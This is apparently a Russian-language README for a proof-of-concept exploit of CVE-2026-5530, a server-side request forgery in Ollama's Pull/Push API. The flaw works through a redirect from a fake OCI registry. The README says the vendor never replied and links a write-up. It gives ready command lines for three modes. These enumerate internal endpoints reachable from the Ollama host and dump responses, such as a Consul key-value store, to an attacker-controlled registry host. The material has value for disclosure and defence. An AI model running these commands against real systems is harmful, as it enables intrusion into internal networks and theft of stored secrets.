
Эксплойт proof-of-concept для CVE-2026-5530, SSRF в Pull/Push API Ollama, позволяющий перечислять внутренние конечные точки и полностью выгружать ответы через поддельный OCI-реестр.
SSRF в Ollama через редирект OCI-реестра с полной эксфильтрацией ответа.
Разбор: https://davidrochester.com/posts/cve-2026-5530
С Ollama связывались несколько раз, но ответа не последовало.
Три режима: enum, exfil и probe.
Находит живые внутренние конечные точки, доступные с хоста Ollama.
python3 poc.py targets.txt --registry-host <ваш-ip>
Эксфильтрирует ответы SSRF, когда известен размер ответа.
python3 poc.py http://internal:8500/v1/kv/?recurse --exfil --size 960 --registry-host <ваш-ip>
Автоматически выполняет бинарный поиск размера ответа, затем эксфильтрирует.
python3 poc.py http://internal:8500/v1/kv/?recurse --probe --registry-host <ваш-ip>
target URL или файл с URL-адресами (по одному в строке, # для комментариев)
-p, --port порт вредоносного реестра (по умолчанию: 9999)
--exfil-port порт реестра эксфильтрации (по умолчанию: 10000)
--exfil режим эксфильтрации, требует --size
--probe бинарный поиск размера, затем эксфильтрация
--size Content-Length (обязателен с --exfil)
--registry-host IP/имя хоста атакующего, доступное для Ollama
--ollama URL API Ollama (по умолчанию: http://127.0.0.1:11434)